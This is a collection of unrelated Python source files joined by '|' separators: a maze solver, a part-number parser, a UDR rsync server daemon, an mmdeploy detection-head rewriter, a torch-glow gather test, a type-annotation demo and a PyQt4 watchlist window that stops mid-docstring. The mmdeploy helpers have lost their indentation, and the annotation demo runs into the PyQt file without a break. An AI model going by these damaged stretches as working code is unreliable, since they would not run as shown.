            return Nodo(matriz[x][y+1],(x,y+1),[verificarAbajo(x,y+1,nodo),verificarArriba(x,y+1,nodo),verificarIzquierda(x,y+1,nodo),verificarDerecha(x,y+1,nodo)])
        else:
            return None
    else:
        return None
def verificarIzquierda(x,y,nodo):
    """Try to expand the search tree one cell to the left of (x, y).

    Mirror of verificarDerecha; see its notes — the `!= 1` wall test
    compares str cells to an int and is always True (TODO confirm).
    """
    print((x,y),"←")
    if(y-1>=0 and matriz[x][y-1]!=1):
        # Mark visited before recursing; order matters.
        if(buscar(nodo,(x,y-1))!=True):
            nodo.agregarHijo(Nodo(matriz[x][y-1],(x,y-1),[]))
            return Nodo(matriz[x][y-1],(x,y-1),[verificarAbajo(x,y-1,nodo),verificarArriba(x,y-1,nodo),verificarIzquierda(x,y-1,nodo),verificarDerecha(x,y-1,nodo)])
        else:
            return None
    else:
        return None
def verificarAbajo(x,y,nodo):
    """Try to expand the search tree one cell below (x, y).

    Mirror of verificarDerecha; see its notes — the `!= 1` wall test
    compares str cells to an int and is always True (TODO confirm).
    """
    print((x,y),"↓")
    if(x+1<=len(matriz)-1 and matriz[x+1][y]!=1):
        # Mark visited before recursing; order matters.
        if(buscar(nodo,(x+1,y))!=True):
            nodo.agregarHijo(Nodo(matriz[x+1][y],(x+1,y),[]))
            return Nodo(matriz[x+1][y],(x+1,y),[verificarAbajo(x+1,y,nodo),verificarArriba(x+1,y,nodo),verificarIzquierda(x+1,y,nodo),verificarDerecha(x+1,y,nodo)])
        else:
            return None
    else:
        return None
def verificarArriba(x,y,nodo):
    """Try to expand the search tree one cell above (x, y).

    Mirror of verificarDerecha; see its notes — the `!= 1` wall test
    compares str cells to an int and is always True (TODO confirm).
    """
    print((x,y),"↑")
    if(x-1>=0 and matriz[x-1][y]!=1):
        # Mark visited before recursing; order matters.
        if(buscar(nodo,(x-1,y))!=True):
            nodo.agregarHijo(Nodo(matriz[x-1][y],(x-1,y),[]))
            return Nodo(matriz[x-1][y],(x-1,y),[verificarAbajo(x-1,y,nodo),verificarArriba(x-1,y,nodo),verificarIzquierda(x-1,y,nodo),verificarDerecha(x-1,y,nodo)])
        else:
            return None
    else:
        return None
# Dump the first six maze rows for debugging.
print(matriz[0])
print(matriz[1])
print(matriz[2])
print(matriz[3])
print(matriz[4])
print(matriz[5])
buscarX(matriz)
# NOTE(review): `raiz` is never assigned anywhere in this file, so this
# line raises NameError as written — confirm where the root node is meant
# to come from (colocarArbol also expects it as a global).
if(buscarValor(raiz,"y")==True):
    print("Si tiene solución")
else:
    print("No tiene solución")
|
from .models import PartClass
def full_part_number_to_broken_part(part_number):
    """Decode a full part-number string into its class/item/variation pieces.

    Layout: characters 0-2 select the PartClass by code, 4-7 are the item
    number and 9 onward the variation — positions 3 and 8 are presumably
    separator characters (TODO confirm the exact format with callers).

    Raises IndexError when no PartClass matches the three-letter code.
    """
    matching_classes = PartClass.objects.filter(code=part_number[:3])
    return {
        'class': matching_classes[0],
        'item': part_number[4:8],
        'variation': part_number[9:],
    }
|
#!/usr/bin/env python
# Copyright 2012 Laboratory for Advanced Computing at the University of Chicago
#
# This file is part of UDR.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os, re, sys, pwd, grp, time
import signal, optparse, subprocess, logging
import SocketServer
from daemon import Daemon
class UDRHandler(SocketServer.StreamRequestHandler):
    """
    Handler for incoming UDR connections, ignores the UDR command sent and builds it's own
    UDR command to run on the server based on the server's configuration.

    NOTE(review): Python 2 only (SocketServer module, `except OSError, err`).
    """
    def handle(self):
        """Read one udr command line from the client, spawn a server-side udr
        process, and write the port line it prints back to the client."""
        logging.info('New connection from %s' % self.client_address[0])
        #depends on the udr cmd having a newline at the end
        #perhaps should add a timeout, or maybe none at all
        line = self.rfile.readline().strip()
        if not line:
            logging.warning('Connection problem, did not receive udr command from client')
        else:
            # Build the command from server config; the client's text is ignored.
            udr_cmd = []
            udr_cmd.append(self.server.params['udr'])
            udr_cmd.append('-x')
            udr_cmd.append('--config')
            udr_cmd.append(self.server.params['rsyncd conf'])
            if self.server.params['verbose']:
                udr_cmd.append('-v')
            # Translate symbolic gid/uid from rsyncd.conf to numeric ids.
            if 'gid' in self.server.rsync_params:
                udr_cmd.append('--rsync-gid')
                if not self.server.rsync_params['gid'].isdigit():
                    udr_cmd.append(str(grp.getgrnam(self.server.rsync_params['gid']).gr_gid))
                else:
                    udr_cmd.append(self.server.rsync_params['gid'])
            if 'uid' in self.server.rsync_params:
                udr_cmd.append('--rsync-uid')
                if not self.server.rsync_params['uid'].isdigit():
                    udr_cmd.append(str(pwd.getpwnam(self.server.rsync_params['uid']).pw_uid))
                else:
                    udr_cmd.append(self.server.rsync_params['uid'])
            udr_cmd.append('-a')
            udr_cmd.append(self.server.params['start port'])
            udr_cmd.append('-b')
            udr_cmd.append(self.server.params['end port'])
            udr_cmd.append('-t')
            udr_cmd.append('rsync')
            logging.debug('UDR cmd: %s' % udr_cmd)
            try:
                # Reap children automatically; we only need udr's first line.
                signal.signal(signal.SIGCHLD,signal.SIG_IGN)
                udr_proc = subprocess.Popen(udr_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
                # First stdout line starts with the port udr chose.
                firstline = udr_proc.stdout.readline()
                logging.debug('firstline: ' + firstline)
                logging.info('providing port %s for UDR to %s' % (firstline.split()[0], self.client_address[0]))
                self.wfile.write(firstline)
            except OSError, err:
                logging.critical('%s, cmd: %s, exiting.' % (' '.join(udr_cmd), err.strerror))
                sys.exit(1)
class UDRServer(Daemon, object):
    """
    Server daemon containing methods to handle the configuration, logging and setting uid/gid
    when appropriate
    """
    def __init__(self, configfile, verbose=False):
        # Defaults, then overridden by the daemon config file.
        self.params = {}
        self.params['verbose'] = verbose
        self.params['udr'] = 'udr'
        self.params['start port'] = '9000'
        self.params['end port'] = '9100'
        self.params['address'] = '0.0.0.0'
        self.params['server port'] = 9000
        self.params['rsyncd conf'] = '/etc/rsyncd.conf'
        self.params['pid file'] = '/var/run/udrd.pid'
        self.params['log file'] = ''.join([os.getcwd(), '/udr.log'])
        self.parse_conf(configfile, self.params)
        #check that rsyncd.conf exists, otherwise rsync fails silently
        self.rsync_params = {}
        self.parse_conf(self.params['rsyncd conf'], self.rsync_params)
        super(UDRServer, self).__init__(pidfile=self.params['pid file'], stdout=self.params['log file'], stderr=self.params['log file'])
    def run(self):
        """Daemon body: drop privileges, configure logging, serve forever."""
        self.set_uid_gid()
        self.config_logger()
        SocketServer.TCPServer.allow_reuse_address = True
        server = SocketServer.TCPServer((self.params['address'], int(self.params['server port'])), UDRHandler)
        # Handlers read these via self.server.
        server.params = self.params
        server.rsync_params = self.rsync_params
        logging.debug('params: %s' % str(self.params))
        logging.info('UDR server started on %s %s' % (self.params['address'], self.params['server port']))
        server.serve_forever()
    def set_uid_gid(self):
        """Drop to the configured gid/uid, or nogroup/nobody when running as root.

        gid must be set before uid — once uid is dropped, setgid would fail.
        """
        if 'gid' in self.params:
            if self.params['gid'].isdigit():
                os.setgid(int(self.params['gid']))
            else:
                gid = grp.getgrnam(self.params['gid']).gr_gid
                os.setgid(gid)
        else:
            if os.getegid() == 0:
                os.setgid(grp.getgrnam('nogroup').gr_gid)
        if 'uid' in self.params:
            if self.params['uid'].isdigit():
                os.setuid(int(self.params['uid']))
            else:
                uid = pwd.getpwnam(self.params['uid']).pw_uid
                os.setuid(uid)
        else:
            if os.geteuid() == 0:
                os.setuid(pwd.getpwnam('nobody').pw_uid)
    def read_lines(self, filename):
        """Yield logical lines of a config file, joining backslash continuations.

        NOTE(review): the trailing backslash character itself is kept in the
        joined line — confirm whether downstream parsing tolerates that.
        NOTE(review): the file handle is never explicitly closed.
        """
        linefile = open(filename)
        lines = []
        for line in linefile:
            line = line.strip()
            lines.append(line)
            if not line.endswith("\\"):
                yield "".join(lines)
                lines = []
        if len(lines) > 0:
            yield "".join(lines)
    def parse_conf(self, filename, param_dict):
        """Fill param_dict with key=value pairs from the global section of a conf file.

        Parsing stops at the first [module] header, so only settings that
        appear before any section are read — presumably intentional for
        rsyncd.conf's global section; confirm before changing.
        """
        paren_re = re.compile(r'\[(\w+)\]')
        eq_re = re.compile(r'(.+)=(.+)')
        for line in self.read_lines(filename):
            line = line.strip()
            if line.startswith('#'):
                continue
            paren_result = paren_re.match(line)
            if paren_result is not None:
                curr_module = paren_result.group(1)
                break
            eq_result = eq_re.match(line)
            if eq_result is not None:
                key = eq_result.group(1).strip()
                value = eq_result.group(2).strip()
                param_dict[key] = value
    def config_logger(self):
        """Attach a file handler to the root logger at the configured level (default INFO)."""
        logger = logging.getLogger()
        handler = logging.FileHandler(self.params['log file'])
        formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
        handler.setFormatter(formatter)
        logger.addHandler(handler)
        if 'log level' in self.params:
            logger.setLevel(getattr(logging, self.params['log level'].upper()))
        else:
            logger.setLevel(logging.INFO)
def main():
    """
    Parses server options and start|stop|restart|foreground UDRServer daemon

    NOTE(review): Python 2 only (print statements). The action keyword is
    taken from sys.argv[-1], not from optparse's positional args.
    """
    parser = optparse.OptionParser()
    parser.add_option('-c', '--config', dest='config', help='UDR server config file')
    parser.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False)
    parser.add_option('-s', '--silent', action='store_true', dest='silent', default=False)
    (options, args) = parser.parse_args()
    if options.config:
        configfile = options.config
    else:
        configfile = '/etc/udrd.conf'
    daemon = UDRServer(configfile, options.verbose)
    if len(sys.argv) > 1:
        if 'start' == sys.argv[-1]:
            if not options.silent:
                sys.stderr.write('Starting UDR server\n')
            daemon.start()
        elif 'stop' == sys.argv[-1]:
            if not options.silent:
                sys.stderr.write('Stopping UDR server\n')
            daemon.stop()
        elif 'restart' == sys.argv[-1]:
            if not options.silent:
                sys.stderr.write('Stopping UDR server\n')
            daemon.stop()
            # Brief pause so the old process can release the pid file/port.
            time.sleep(2)
            if not options.silent:
                sys.stderr.write('Starting UDR server\n')
            daemon.start()
        elif 'foreground' == sys.argv[-1]:
            # Run without daemonizing (useful for debugging).
            daemon.run()
        else:
            print "usage: %s [options] start|stop|restart|foreground" % sys.argv[0]
            sys.exit(2)
        sys.exit(0)
    else:
        print "usage: %s [options] start|stop|restart|foreground" % sys.argv[0]
        sys.exit(2)
if __name__ == '__main__':
    main()
|
# Copyright (c) OpenMMLab. All rights reserved.
from typing import Sequence
import torch
from mmdeploy.codebase.mmdet import (get_post_processing_params,
multiclass_nms,
pad_with_value_if_necessary)
from mmdeploy.core import FUNCTION_REWRITER
from mmdeploy.utils import is_dynamic_shape
def _bbox_pre_decode(points: torch.Tensor, bbox_pred: torch.Tensor,
stride: torch.Tensor):
"""compute real bboxes."""
points = points[..., :2]
bbox_pos_center = torch.cat([points, points], dim=-1)
bboxes = bbox_pred * stride + bbox_pos_center
return bboxes
def _bbox_post_decode(bboxes: torch.Tensor, max_shape: Sequence[int]):
"""clamp bbox."""
x1 = bboxes[..., 0].clamp(min=0, max=max_shape[1])
y1 = bboxes[..., 1].clamp(min=0, max=max_shape[0])
x2 = bboxes[..., 2].clamp(min=0, max=max_shape[1])
y2 = bboxes[..., 3].clamp(min=0, max=max_shape[0])
decoded_bboxes = torch.stack([x1, y1, x2, y2], dim=-1)
return decoded_bboxes
@FUNCTION_REWRITER.register_rewriter(
    'mmdet.models.dense_heads.RepPointsHead.points2bbox')
def reppoints_head__points2bbox(ctx, self, pts, y_first=True):
    """Rewrite of `points2bbox` in `RepPointsHead`.
    Use `self.moment_transfer` in `points2bbox` will cause error:
    RuntimeError: Input, output and indices must be on the current device

    Workaround: temporarily replace the registered `moment_transfer`
    parameter with a plain tensor copy for the duration of the original
    call, then restore it. The delattr is required so the assignment below
    bypasses nn.Module's parameter registration.
    """
    moment_transfer = self.moment_transfer
    delattr(self, 'moment_transfer')
    self.moment_transfer = torch.tensor(moment_transfer.data)
    ret = ctx.origin_func(self, pts, y_first=y_first)
    # Restore the original parameter so later calls/training are unaffected.
    self.moment_transfer = moment_transfer
    return ret
@FUNCTION_REWRITER.register_rewriter(
    'mmdet.models.dense_heads.RepPointsHead.get_bboxes')
def reppoints_head__get_bboxes(ctx,
                               self,
                               cls_scores,
                               bbox_preds,
                               score_factors=None,
                               img_metas=None,
                               cfg=None,
                               rescale=None,
                               **kwargs):
    """Rewrite `get_bboxes` of `RepPointsHead` for default backend.
    Rewrite this function to deploy model, transform network output for a
    batch into bbox predictions.
    Args:
        ctx (ContextCaller): The context with additional information.
        self (RepPointsHead): The instance of the class RepPointsHead.
        cls_scores (list[Tensor]): Box scores for each scale level
            with shape (N, num_anchors * num_classes, H, W).
        bbox_preds (list[Tensor]): Box energies / deltas for each scale
            level with shape (N, num_anchors * 4, H, W).
        score_factors (list[Tensor], Optional): Score factor for
            all scale level, each is a 4D-tensor, has shape
            (batch_size, num_priors * 1, H, W). Default None.
        img_metas (list[dict]): Meta information of the image, e.g.,
            image size, scaling factor, etc.
        cfg (mmcv.Config | None): Test / postprocessing configuration,
            if None, test_cfg would be used. Default: None.
        rescale (bool): If True, return boxes in original image space.
            Default: False.
    Returns:
        tuple[Tensor, Tensor]: tuple[Tensor, Tensor]: (dets, labels),
            `dets` of shape [N, num_det, 5] and `labels` of shape
            [N, num_det].
    """
    deploy_cfg = ctx.cfg
    is_dynamic_flag = is_dynamic_shape(deploy_cfg)
    num_levels = len(cls_scores)
    featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
    mlvl_priors = self.prior_generator.grid_priors(
        featmap_sizes, dtype=bbox_preds[0].dtype, device=bbox_preds[0].device)
    # Add a batch axis so priors broadcast against batched predictions.
    mlvl_priors = [priors.unsqueeze(0) for priors in mlvl_priors]
    mlvl_cls_scores = [cls_scores[i].detach() for i in range(num_levels)]
    mlvl_bbox_preds = [bbox_preds[i].detach() for i in range(num_levels)]
    assert img_metas is not None
    img_shape = img_metas[0]['img_shape']
    assert len(cls_scores) == len(bbox_preds) == len(mlvl_priors)
    batch_size = cls_scores[0].shape[0]
    # The passed-in cfg is intentionally ignored in favor of test_cfg.
    cfg = self.test_cfg
    pre_topk = cfg.get('nms_pre', -1)
    mlvl_valid_bboxes = []
    mlvl_valid_scores = []
    for level_idx, (cls_score, bbox_pred, priors) in enumerate(
            zip(mlvl_cls_scores, mlvl_bbox_preds, mlvl_priors)):
        assert cls_score.size()[-2:] == bbox_pred.size()[-2:]
        # (N, C, H, W) -> (N, H*W, num_classes) / (N, H*W, 4).
        scores = cls_score.permute(0, 2, 3, 1).reshape(batch_size, -1,
                                                       self.cls_out_channels)
        if self.use_sigmoid_cls:
            scores = scores.sigmoid()
        else:
            scores = scores.softmax(-1)
        bbox_pred = bbox_pred.permute(0, 2, 3, 1).reshape(batch_size, -1, 4)
        if not is_dynamic_flag:
            # Static shapes: constant-fold the priors into the graph.
            priors = priors.data
        if pre_topk > 0:
            # Pad so topk is valid even when a level has < pre_topk boxes.
            priors = pad_with_value_if_necessary(priors, 1, pre_topk)
            bbox_pred = pad_with_value_if_necessary(bbox_pred, 1, pre_topk)
            scores = pad_with_value_if_necessary(scores, 1, pre_topk, 0.)
            nms_pre_score = scores
            # Get maximum scores for foreground classes.
            if self.use_sigmoid_cls:
                max_scores, _ = nms_pre_score.max(-1)
            else:
                max_scores, _ = nms_pre_score[..., :-1].max(-1)
            _, topk_inds = max_scores.topk(pre_topk)
            batch_inds = torch.arange(
                batch_size, device=bbox_pred.device).unsqueeze(-1)
            prior_inds = batch_inds.new_zeros((1, 1))
            priors = priors[prior_inds, topk_inds, :]
            bbox_pred = bbox_pred[batch_inds, topk_inds, :]
            scores = scores[batch_inds, topk_inds, :]
        bbox_pred = _bbox_pre_decode(priors, bbox_pred,
                                     self.point_strides[level_idx])
        mlvl_valid_bboxes.append(bbox_pred)
        mlvl_valid_scores.append(scores)
    batch_mlvl_bboxes_pred = torch.cat(mlvl_valid_bboxes, dim=1)
    batch_scores = torch.cat(mlvl_valid_scores, dim=1)
    # Clamp all levels' boxes to the input image extent at once.
    batch_bboxes = _bbox_post_decode(
        bboxes=batch_mlvl_bboxes_pred, max_shape=img_shape)
    if not self.use_sigmoid_cls:
        # Drop the softmax background column.
        batch_scores = batch_scores[..., :self.num_classes]
    post_params = get_post_processing_params(deploy_cfg)
    max_output_boxes_per_class = post_params.max_output_boxes_per_class
    iou_threshold = cfg.nms.get('iou_threshold', post_params.iou_threshold)
    score_threshold = cfg.get('score_thr', post_params.score_threshold)
    pre_top_k = post_params.pre_top_k
    keep_top_k = cfg.get('max_per_img', post_params.keep_top_k)
    return multiclass_nms(
        batch_bboxes,
        batch_scores,
        max_output_boxes_per_class,
        iou_threshold=iou_threshold,
        score_threshold=score_threshold,
        pre_top_k=pre_top_k,
        keep_top_k=keep_top_k)
|
import torch
from tests import utils
class GatherModule(torch.nn.Module):
    """Thin nn.Module wrapper around torch.gather along a fixed dimension."""

    def __init__(self, dimension):
        super(GatherModule, self).__init__()
        # Axis along which forward() gathers.
        self.dimension = dimension

    def forward(self, tensor, index):
        """Gather elements of `tensor` along the configured dimension using `index`."""
        gathered = torch.gather(tensor, self.dimension, index)
        return gathered
class TestGather(utils.TorchGlowTestCase):
    """Parameterized glow-fusion tests for aten::gather via GatherModule."""

    # Each lambda yields (case_name, input_tensor, gather_dim, index_tensor);
    # lambdas defer tensor construction until the case actually runs.
    @utils.deterministic_expand(
        [
            lambda: (
                "basic-1dim",
                torch.tensor([1, 2, 3, 4]),
                0,
                torch.tensor([0, 0, 1, 0]),
            ),
            lambda: (
                "0-dim",
                torch.tensor([[1, 2], [3, 4]]),
                0,
                torch.tensor([[0, 1], [0, 1]]),
            ),
            lambda: (
                "1-dim",
                torch.tensor([[1, 2], [3, 4]]),
                1,
                torch.tensor([[0, 0], [0, 0]]),
            ),
            lambda: (
                "2-dim",
                torch.randn(3, 4, 2),
                2,
                torch.empty(3, 4, 2).random_(2).long(),
            ),
        ]
    )
    def test_gather(self, _, tensor, dimension, index):
        """Trace GatherModule and check aten::gather is fused (glow run skipped)."""
        utils.compare_tracing_methods(
            GatherModule(dimension),
            tensor,
            index,
            skip_to_glow=True,
            fusible_ops={"aten::gather"},
        )
|
# coding: utf-8
from .link import Link
from .statistics import ImportStatistics
|
import math
""" 今天看了一篇Python的文章,才发现还有这种写法,这基本上和Swift没什么区别了 """
def swiftStyle():
    """A Swift-style function expression demo using Python type annotations."""
    a: str = "aa"
    b: int = 1
    # Although `a` is annotated as str, assigning 2 here still works —
    # annotations are not enforced at runtime, and print shows no issue.
    a = 2
    print(a)
    isinstance(a, int)
    # With annotated parameters and return types, editors can offer hints
    # at the call site.
    def example(a: str) -> str:
        return f"Hello {a}"
    print(example(a = "world"))
    # Simple annotations may look useless — but what if we give the
    # aliases meaningful names?
    User = str
    Age = int
    Answer = str
    # NOTE(review): this is a plain tuple of types, not a typing construct;
    # it works only as documentation, not for type checking.
    Location = (float, float)
    Distance = float
    def distanceBetweenPoint1(point, toPoint):
        x1, y1 = toPoint
        x2, y2 = point
        dx = x1 - x2
        dy = y1 - y2
        distance = math.sqrt(dx * dx + dy * dy) # (dx * dx + dy * dy) ** 0.5
        return distance
    def distanceBetweenPoint2(point: Location, toPoint: Location):
        x1, y1 = toPoint
        x2, y2 = point
        dx = x1 - x2
        dy = y1 - y2
        distance = math.sqrt(dx * dx + dy * dy)
        return distance
    def distanceBetweenPoint3(point: Location, toPoint: Location) -> Distance:
        x1, y1 = toPoint
        x2, y2 = point
        dx = x1 - x2
        dy = y1 - y2
        distance = math.sqrt(dx * dx + dy * dy)
        return distance
    def say_hello(u: User) -> Answer:
        """Given user info, return a greeting."""
        return f"Hello {u}"
    print(say_hello("Shadow"))
    distance1 = distanceBetweenPoint1((0, 2), (5, 7))
    print(distance1)
    distance2 = distanceBetweenPoint2(point=(0, 2), toPoint=(5, 7))
    print(distance2)
    distance3 = distanceBetweenPoint3(point=(0, 2), toPoint=(5, 7))
    print(distance3)
    # Writing it this way would crash (strings don't unpack to two floats):
    #distance4 = distanceBetweenPoint3(point="haha", toPoint="hehe")
    #print(distance4)
# Run the demo only when executed as a script.
if __name__ == "__main__":
    swiftStyle()
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'exampleWatchlist.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
# This code is to be used as a reference for the code for generating the watchlist
# window when a user loads their watchlist file
from PyQt4 import QtCore, QtGui
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # PyQt builds using API v2 have no QString; plain str pass-through works.
    def _fromUtf8(s):
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # PyQt versions without UnicodeUTF8: translate without an encoding arg.
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    """Designer-generated watchlist window: a button column on the left,
    a movie-title column on the right, plus a File menu (Open/Save/Quit).

    NOTE: this file targets Python 2 / PyQt4 (print statements below).
    """

    def setupUi(self, MainWindow):
        """Build all widgets, layouts, menus and actions on *MainWindow*."""
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(800, 600)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        self.horizontalLayoutWidget = QtGui.QWidget(self.centralwidget)
        self.horizontalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 801, 551))
        self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
        self.horizontalLayout_2 = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        # Left column: scroll area holding the six "More Details" buttons.
        self.scrollArea = QtGui.QScrollArea(self.horizontalLayoutWidget)
        self.scrollArea.setWidgetResizable(True)
        self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
        self.scrollAreaWidgetContents = QtGui.QWidget()
        self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 130, 547))
        self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
        self.verticalLayoutWidget = QtGui.QWidget(self.scrollAreaWidgetContents)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 131, 551))
        self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
        self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
        self.pushButton = QtGui.QPushButton(self.verticalLayoutWidget)
        self.pushButton.setObjectName(_fromUtf8("pushButton"))
        self.verticalLayout_3.addWidget(self.pushButton)
        self.pushButton_2 = QtGui.QPushButton(self.verticalLayoutWidget)
        self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
        self.verticalLayout_3.addWidget(self.pushButton_2)
        self.pushButton_3 = QtGui.QPushButton(self.verticalLayoutWidget)
        self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
        self.verticalLayout_3.addWidget(self.pushButton_3)
        self.pushButton_4 = QtGui.QPushButton(self.verticalLayoutWidget)
        self.pushButton_4.setObjectName(_fromUtf8("pushButton_4"))
        self.verticalLayout_3.addWidget(self.pushButton_4)
        self.pushButton_5 = QtGui.QPushButton(self.verticalLayoutWidget)
        self.pushButton_5.setObjectName(_fromUtf8("pushButton_5"))
        self.verticalLayout_3.addWidget(self.pushButton_5)
        self.pushButton_6 = QtGui.QPushButton(self.verticalLayoutWidget)
        self.pushButton_6.setObjectName(_fromUtf8("pushButton_6"))
        self.verticalLayout_3.addWidget(self.pushButton_6)
        # Spacer pins the buttons to the top of the column.
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout_3.addItem(spacerItem)
        self.scrollArea.setWidget(self.scrollAreaWidgetContents)
        self.horizontalLayout_2.addWidget(self.scrollArea)
        # Right column: scroll area holding the six movie-title labels.
        self.scrollArea_2 = QtGui.QScrollArea(self.horizontalLayoutWidget)
        self.scrollArea_2.setWidgetResizable(True)
        self.scrollArea_2.setObjectName(_fromUtf8("scrollArea_2"))
        self.scrollAreaWidgetContents_3 = QtGui.QWidget()
        self.scrollAreaWidgetContents_3.setGeometry(QtCore.QRect(0, 0, 659, 547))
        self.scrollAreaWidgetContents_3.setObjectName(_fromUtf8("scrollAreaWidgetContents_3"))
        self.verticalLayoutWidget_2 = QtGui.QWidget(self.scrollAreaWidgetContents_3)
        self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(-1, -1, 661, 551))
        self.verticalLayoutWidget_2.setObjectName(_fromUtf8("verticalLayoutWidget_2"))
        self.verticalLayout_4 = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
        self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
        self.label = QtGui.QLabel(self.verticalLayoutWidget_2)
        self.label.setObjectName(_fromUtf8("label"))
        self.verticalLayout_4.addWidget(self.label)
        self.label_2 = QtGui.QLabel(self.verticalLayoutWidget_2)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.verticalLayout_4.addWidget(self.label_2)
        self.label_3 = QtGui.QLabel(self.verticalLayoutWidget_2)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.verticalLayout_4.addWidget(self.label_3)
        self.label_4 = QtGui.QLabel(self.verticalLayoutWidget_2)
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.verticalLayout_4.addWidget(self.label_4)
        self.label_5 = QtGui.QLabel(self.verticalLayoutWidget_2)
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.verticalLayout_4.addWidget(self.label_5)
        self.label_6 = QtGui.QLabel(self.verticalLayoutWidget_2)
        self.label_6.setObjectName(_fromUtf8("label_6"))
        self.verticalLayout_4.addWidget(self.label_6)
        spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout_4.addItem(spacerItem1)
        self.scrollArea_2.setWidget(self.scrollAreaWidgetContents_3)
        self.horizontalLayout_2.addWidget(self.scrollArea_2)
        # 1:5 width ratio between the button column and the titles column.
        self.horizontalLayout_2.setStretch(0, 1)
        self.horizontalLayout_2.setStretch(1, 5)
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtGui.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 25))
        self.menubar.setObjectName(_fromUtf8("menubar"))
        self.menuFile = QtGui.QMenu(self.menubar)
        self.menuFile.setObjectName(_fromUtf8("menuFile"))
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtGui.QStatusBar(MainWindow)
        self.statusbar.setObjectName(_fromUtf8("statusbar"))
        MainWindow.setStatusBar(self.statusbar)
        self.actionOpen = QtGui.QAction(MainWindow)
        self.actionOpen.setObjectName(_fromUtf8("actionOpen"))
        self.actionSave = QtGui.QAction(MainWindow)
        self.actionSave.setObjectName(_fromUtf8("actionSave"))
        self.actionQuit = QtGui.QAction(MainWindow)
        self.actionQuit.setObjectName(_fromUtf8("actionQuit"))
        self.menuFile.addAction(self.actionOpen)
        self.menuFile.addAction(self.actionSave)
        self.menuFile.addAction(self.actionQuit)
        self.menubar.addAction(self.menuFile.menuAction())
        # The following is our hand-typed code within the designer generated constructor method
        # When the Quit action from menu bar is clicked or the shortcut is entered,
        # close the watchlist window
        self.actionQuit.triggered.connect(MainWindow.close)
        self.actionOpen.triggered.connect(self.openWatchlist)
        # When the Open action from menu bar is clicked or the shortcut is entered,
        # get the path of the watchlist file via a QFileDialog
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        """Set all user-visible strings (titles, button/label texts, shortcuts)."""
        MainWindow.setWindowTitle(_translate("MainWindow", "Movie Information - Watchlist", None))
        self.pushButton.setText(_translate("MainWindow", "More Details: 1", None))
        self.pushButton_2.setText(_translate("MainWindow", "More Details: 2", None))
        self.pushButton_3.setText(_translate("MainWindow", "More Details: 3", None))
        self.pushButton_4.setText(_translate("MainWindow", "More Details: 4", None))
        self.pushButton_5.setText(_translate("MainWindow", "More Details: 5", None))
        self.pushButton_6.setText(_translate("MainWindow", "More Details: 6", None))
        self.label.setText(_translate("MainWindow", "1: Captain America: Civil War (2016)", None))
        self.label_2.setText(_translate("MainWindow", "2: Good Will Hunting (1997)", None))
        self.label_3.setText(_translate("MainWindow", "3: Black Hawk Down (2001)", None))
        self.label_4.setText(_translate("MainWindow", "4: Jimmy Neutron Boy Genius (2001)", None))
        self.label_5.setText(_translate("MainWindow", "5: Despicable Me (2010)", None))
        self.label_6.setText(_translate("MainWindow", "6: Watchmen (2009)", None))
        self.menuFile.setTitle(_translate("MainWindow", "File", None))
        self.actionOpen.setText(_translate("MainWindow", "Open", None))
        self.actionOpen.setShortcut(_translate("MainWindow", "Ctrl+O", None))
        self.actionSave.setText(_translate("MainWindow", "Save", None))
        self.actionSave.setShortcut(_translate("MainWindow", "Ctrl+S", None))
        self.actionQuit.setText(_translate("MainWindow", "Quit", None))
        self.actionQuit.setShortcut(_translate("MainWindow", "Ctrl+Q", None))

    def openWatchlist(self):
        """Prompt for a .wl file and dump its contents to stdout.

